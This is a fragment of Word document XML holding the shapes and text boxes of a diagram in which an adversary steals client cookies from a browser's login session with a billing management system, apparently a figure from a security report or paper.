                <v:rect id="Rectangle 1444" o:spid="_x0000_s1055" style="position:absolute;left:22646;top:25054;width:6035;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2BC313A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>ADVERSARY</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1445" o:spid="_x0000_s1056" style="position:absolute;left:36924;top:2863;width:777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06B1F8B4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>WEB BROWSER</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1446" o:spid="_x0000_s1057" style="position:absolute;left:37322;top:4114;width:6582;height:6563;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="658202,6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9/xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0L/Q9hBG+aVUTK1ijtFtGLSLWU9jZsxt2tyWTdRF3/vREEb/N4nzOdt9aIMzW+cqxgOEhAEOdO&#10;V1wo+N4t+q8gfEDWaByTgit5mM9eOlNMtbvwF523oRAxhH2KCsoQ6lRKn5dk0Q9cTRy5vWsshgib&#10;QuoGLzHcGjlKkom0WHFsKLGmrKT8sD1ZBbjY/7V2Ez4PZm2W/78/2cfxminV67bvbyACteEpfrhX&#10;Os4fjydw/yaeIGc3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANMk/3/EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m329159,c510864,,658202,146919,658202,328107v,181304,-147338,328223,-329043,328223c147338,656330,,509411,,328107,,146919,147338,,329159,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,658202,656330"/>
                </v:shape>
                <v:shape id="Shape 1447" o:spid="_x0000_s1058" style="position:absolute;left:37322;top:4114;width:6582;height:6563;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="658202,6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R6xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlCr1Is7GKtWlWEUGwgqJpe+htyE6TYHY2ZNeY/vtuQfA2j/c56bI3teiodZVlBeMoBkGc&#10;W11xoeDzY/M0B+E8ssbaMin4JQfLxXCQYqLtlU/UZb4QIYRdggpK75tESpeXZNBFtiEO3I9tDfoA&#10;20LqFq8h3NTyOY5n0mDFoaHEhtYl5efsYhSY79kXT3b7Y3c4vs5H2bt2eu2VenzoV28gPPX+Lr65&#10;tzrMn05f4P+bcIJc/AEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDskwR6xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,328107c,146919,147338,,329159,,510864,,658202,146919,658202,328107v,181304,-147338,328223,-329043,328223c147338,656330,,509411,,328107xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08039mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,658202,656330"/>
                </v:shape>
                <v:rect id="Rectangle 1448" o:spid="_x0000_s1059" style="position:absolute;left:39383;top:5869;width:3591;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0A2CC7BD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>Billiing</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1449" o:spid="_x0000_s1060" style="position:absolute;left:38091;top:6978;width:6991;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140A87BC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Management </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1450" o:spid="_x0000_s1061" style="position:absolute;left:39267;top:8094;width:3608;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86AD8CE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>System</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1451" o:spid="_x0000_s1062" style="position:absolute;left:37713;top:1730;width:7768;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B5B3E0A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>WEB BROWSER</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1452" o:spid="_x0000_s1063" style="position:absolute;left:15031;top:7395;width:21576;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2157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M5wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fS8Mw&#10;EH4X9j+EG/jm0pUpo1s2ykSY4ItTxh6P5NaWNpeaxLb7740g+HYf38/b7ifbiYF8aBwrWC4yEMTa&#10;mYYrBZ8fLw9rECEiG+wck4IbBdjvZndbLIwb+Z2GU6xECuFQoII6xr6QMuiaLIaF64kTd3XeYkzQ&#10;V9J4HFO47WSeZU/SYsOpocaeDjXp9vRtFTS351x/nctRX8rc8/DWrtvXVqn7+VRuQESa4r/4z300&#10;af7qMYffb9IJcvcDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAhT6jOcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l2157586,e" filled="f" strokecolor="#4672c4" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,2157586,0"/>
                </v:shape>
                <v:shape id="Shape 1453" o:spid="_x0000_s1064" style="position:absolute;left:36505;top:6988;width:817;height:815;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4dxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlCr2IblqrSHQVsRTEXkz04m3MjklqdjbNrhr/vVsoeJvH+5zZojWVuFLjSssK3gYRCOLM&#10;6pJzBfvdV38CwnlkjZVlUnAnB4t5tzPDWNsbJ3RNfS5CCLsYFRTe17GULivIoBvYmjhwJ9sY9AE2&#10;udQN3kK4qeR7FI2lwZJDQ4E1rQrKzunFKPC7wyb5pXp1T3pbOfz8OabJ8lup15d2OQXhqfVP8b97&#10;rcP8j9EQ/r4JJ8j5AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANMl7h3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l81738,40753,,81506,,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81506"/>
                </v:shape>
                <v:shape id="Shape 49600" o:spid="_x0000_s1065" style="position:absolute;left:22952;top:6839;width:6450;height:1112;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="644977,1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jMxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/LasJA&#10;FIb3Qt9hOIXudMZqg0ZHKQWt1YV4AbeHzDFJzZyJmVHTt+8sCl3+/De+6by1lbhT40vHGvo9BYI4&#10;c6bkXMPxsOiOQPiAbLByTBp+yMN89tSZYmrcg3d034dcxBH2KWooQqhTKX1WkEXfczVx9M6usRii&#10;bHJpGnzEcVvJV6USabHk+FBgTR8FZZf9zWpYHjef293tlByu/ms9WC8uy7dvpfXLc/s+ARGoDf/h&#10;v/bKaBiOExUBIk5EATn7BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFOheMzHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m,l644977,r,111143l,111143,,e" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,644977,111143"/>
                </v:shape>
                <v:rect id="Rectangle 1455" o:spid="_x0000_s1066" style="position:absolute;left:22951;top:6978;width:8639;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942BEA5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="3D64AC"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>HTTP GET/LOGIN</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1456" o:spid="_x0000_s1067" style="position:absolute;left:11741;top:1653;width:28873;height:3388;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2887308,33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FzwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4f+D+EE/Y2U2UWqaZl6AYDQTYVfT2bsy1rLjXJtP73y2Cwt/v4ft6i6E0rruR8Y1nBeJSAIC6t&#10;brhSsN+9Pc1A+ICssbVMCu7kocgHDwvMtL3xJ123oRIxhH2GCuoQukxKX9Zk0I9sRxy5s3UGQ4Su&#10;ktrhLYabVk6SJJUGG44NNXa0rKn82n4bBZSuebq0h13rPvb3E12S42b1qtTjsH+ZgwjUh3/xn/td&#10;x/nP0xR+v4knyPwHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAz7Axc8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m2887308,246138l2887308,,,,,338874e" filled="f" strokecolor="#4672c4" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,2887308,338874"/>
                </v:shape>
                <v:shape id="Shape 1457" o:spid="_x0000_s1068" style="position:absolute;left:11332;top:4939;width:817;height:816;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gexQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/odlhF5EN632Qeoqogiilybx0ts0O03SZmfT7Krx37uC0Nt8fM+ZLTpTixO1rrKs4HEcgSDO&#10;ra64UHDINqM3EM4ja6wtk4ILOVjM+70ZxtqeOaFT6gsRQtjFqKD0vomldHlJBt3YNsSB+7atQR9g&#10;W0jd4jmEm1o+RdGLNFhxaCixoVVJ+W96NAp89rlL/qhZXZLhh5ysf77SZLlX6mHQLd9BeOr8v/ju&#10;3uowf/r8CrdvwglyfgUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCsHugexQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l81738,,40869,81506,,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81506"/>
                </v:shape>
                <v:rect id="Rectangle 1459" o:spid="_x0000_s1069" style="position:absolute;left:22432;top:1227;width:7777;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3D0AB464" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="3D64AC"/>
                            <w:sz w:val="15"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                          </w:rPr>
                          <w:t>AUTHENTICATE</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1460" o:spid="_x0000_s1070" style="position:absolute;left:11741;top:9750;width:28873;height:3389;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2887308,33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700xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvhf6HZQQvohtFpKSuYhWxUC+1lV6H7DQJzc6G3TXG/vrOQehthvfmvW+W6941qqMQa88GppMM&#10;FHHhbc2lgc+P/fgJVEzIFhvPZOBGEdarx4cl5tZf+Z26UyqVhHDM0UCVUptrHYuKHMaJb4lF+/bB&#10;YZI1lNoGvEq4a/QsyxbaYc3SUGFL24qKn9PFGfjqupDO5ZHc/O2X9MtudOgPI2OGg37zDCpRn/7N&#10;9+tXK/jzhfDLNzKCXv0BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAZEu9NMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m2887308,92736r,246139l,338875,,e" filled="f" strokecolor="#4672c4" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,2887308,338875"/>
                </v:shape>
                <v:shape id="Shape 1461" o:spid="_x0000_s1071" style="position:absolute;left:11332;top:9037;width:817;height:815;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x9MxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL0U3WhFJLqKWITSXkz04m3Mjkk0O5tmtxr/vSsI3ubxPme2aE0lLtS40rKCQT8CQZxZ&#10;XXKuYLdd9yYgnEfWWFkmBTdysJh33mYYa3vlhC6pz0UIYRejgsL7OpbSZQUZdH1bEwfuaBuDPsAm&#10;l7rBawg3lRxG0VgaLDk0FFjTqqDsnP4bBX67/0n+qF7dko+N/Pw6HdJk+avUe7ddTkF4av1L/HR/&#10;6zB/NB7A45twgpzfAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAILXH0zEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m40869,l81738,81506,,81506,40869,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81506"/>
                </v:shape>
                <v:shape id="Shape 49601" o:spid="_x0000_s1072" style="position:absolute;left:22448;top:12583;width:5813;height:1111;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="581293,1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7xxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6kZbQ42uoi0tvYlWweMz+0xCsm/j7lbTf98tCB6HmfmGmS0604gLOV9ZVjAcJCCI&#10;c6srLhTsvj+eXkH4gKyxsUwKfsnDYt57mGGm7ZU3dNmGQkQI+wwVlCG0mZQ+L8mgH9iWOHon6wyG&#10;KF0htcNrhJtGjpIklQYrjgsltvRWUl5vf4yCsXdcL/erc318dp/uvU7X+8NZqcd+t5yCCNSFe/jW&#10;/tIKXiZpMoT/O/EKyPkfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB9+vvHHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m,l581293,r,111143l,111143,,e" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,581293,111143"/>
                </v:shape>
                <v:rect id="Rectangle 1463" o:spid="_x0000_s1073" style="position:absolute;left:22449;top:12729;width:7739;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381C7FD3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="3D64AC"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>REPLY COOKIES</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1464" o:spid="_x0000_s1074" style="position:absolute;left:4335;top:7395;width:16898;height:18050;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1689809,18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6rewwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hBG8123YRXY2ipYLYkw9qj0MybpZuJssm6vbfN0LB23x8z5ktOleLK7Wh8qzgZZiBINbe&#10;VFwqOB7Wz2MQISIbrD2Tgl8KsJj3nmZYGH/jHV33sRQphEOBCmyMTSFl0JYchqFviBN39q3DmGBb&#10;StPiLYW7Wr5m2Ug6rDg1WGzo3ZL+2V+cgu3nqbEn/80fk+Nbfvgaa15ZrdSg3y2nICJ18SH+d29M&#10;mp+Pcrh/k06Q8z8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdteq3sMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m411396,l,,,1805030r1689809,e" filled="f" strokecolor="red" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1689809,1805030"/>
                </v:shape>
                <v:shape id="Shape 1465" o:spid="_x0000_s1075" style="position:absolute;left:21131;top:25038;width:818;height:815;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="81738,8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hWxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCL3VTW0VSbOKlpZ689EePA7ZSTYkO5tmt5r6611B8DYf33OyRW8bcaTOV44VPI8SEMS5&#10;0xWXCn6+P59mIHxA1tg4JgX/5GExHzxkmGp34h0d96EUMYR9igpMCG0qpc8NWfQj1xJHrnCdxRBh&#10;V0rd4SmG20aOk2QqLVYcGwy29G4or/d/VsHk5bCtZ644LPuwMauvqv7l84dSj8N++QYiUB/u4pt7&#10;reP81+kErt/EE+T8AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJSFaFbEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l81738,40753,,81505,,xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81505"/>
                </v:shape>
                <v:shape id="Shape 1466" o:spid="_x0000_s1076" style="position:absolute;left:4335;top:7395;width:17614;height:18050;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1761330,18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OwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFLzppqKpRlcpQmk91hbR25Adk2BmNuxuNf77bqHQ2zze56w2PbfqSj40Tgw8jTNQJKWz&#10;jVQGvj5fR3NQIaJYbJ2QgTsF2KwfBissrLvJB133sVIpREKBBuoYu0LrUNbEGMauI0nc2XnGmKCv&#10;tPV4S+Hc6kmW5ZqxkdRQY0fbmsrL/psNzDyXk+fdIuPj2+x04Ptu684nY4aP/csSVKQ+/ov/3O82&#10;zZ/mOfx+k07Q6x8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA8iOfzsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m1761330,1805030l,1805030,,,339875,e" filled="f" strokecolor="red" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1761330,1805030"/>
                </v:shape>
                <v:shape id="Shape 1467" o:spid="_x0000_s1077" style="position:absolute;left:7632;top:6988;width:817;height:815;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KewwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFHrTjbZoia4iirTgqdFLb2N2zCZmZ0N2jfHfd4WCt3m8z1mseluLjlpfOlYwHiUgiHOn&#10;Sy4UHA+74ScIH5A11o5JwZ08rJYvgwWm2t34h7osFCKGsE9RgQmhSaX0uSGLfuQa4sidXWsxRNgW&#10;Urd4i+G2lpMkmUqLJccGgw1tDOWX7GoVbLNzcl9Xs/1pUu1+Q2Het1X3pdTba7+egwjUh6f43/2t&#10;4/yP6Qwe38QT5PIPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAlY4insMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l81738,40753,,81506,,xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81506"/>
                </v:shape>
                <v:shape id="Shape 49602" o:spid="_x0000_s1078" style="position:absolute;left:21;top:22595;width:8629;height:1111;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="862849,1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nyxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW81Y1SQo2uomJLqZcaRfH2yD6zwezbkF01/feuUOhxmJlvmMmss7W4UusrxwoG/QQE&#10;ceF0xaWC3fbj9R2ED8gaa8ek4Jc8zKbPTxPMtLvxhq55KEWEsM9QgQmhyaT0hSGLvu8a4uidXGsx&#10;RNmWUrd4i3Bby2GSpNJixXHBYENLQ8U5v1gF5/VPPlrsV+n3oDmslzuDR/mJSvVeuvkYRKAu/If/&#10;2l9awdsoTYbwuBOvgJzeAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAZWufLHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m,l862849,r,111143l,111143,,e" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,862849,111143"/>
                </v:shape>
                <v:rect id="Rectangle 1469" o:spid="_x0000_s1079" style="position:absolute;top:22755;width:11440;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6E1FF819" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="3D64AC"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>STEAL CLIENT COOKIES</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1471" o:spid="_x0000_s1080" style="position:absolute;left:41489;top:2354;width:4325;height:4176;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="432493,41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1AxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisJA&#10;ELwv+A9DC3vTiSIq0VFEWJT15OOgtzbTJsFMTzYzmujXO4Kwt+qurqqu6bwxhbhT5XLLCnrdCARx&#10;YnXOqYLD/qczBuE8ssbCMil4kIP5rPU1xVjbmrd03/lUBBN2MSrIvC9jKV2SkUHXtSVx4C62MujD&#10;WKVSV1gHc1PIfhQNpcGcQ0KGJS0zSq67m1Fw9n/N6jdKT8/V+HRMikF/U4e9+m43iwkIT43/P/6o&#10;1zq8Pxj14N0mQJCzFwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBJ+81AxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,199134c12656,83590,116802,,232791,12504,348781,25007,432493,128858,419953,244517v-8359,77686,-59213,144257,-132012,173084e" filled="f" strokecolor="#4672c4" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,432493,417601"/>
                </v:shape>
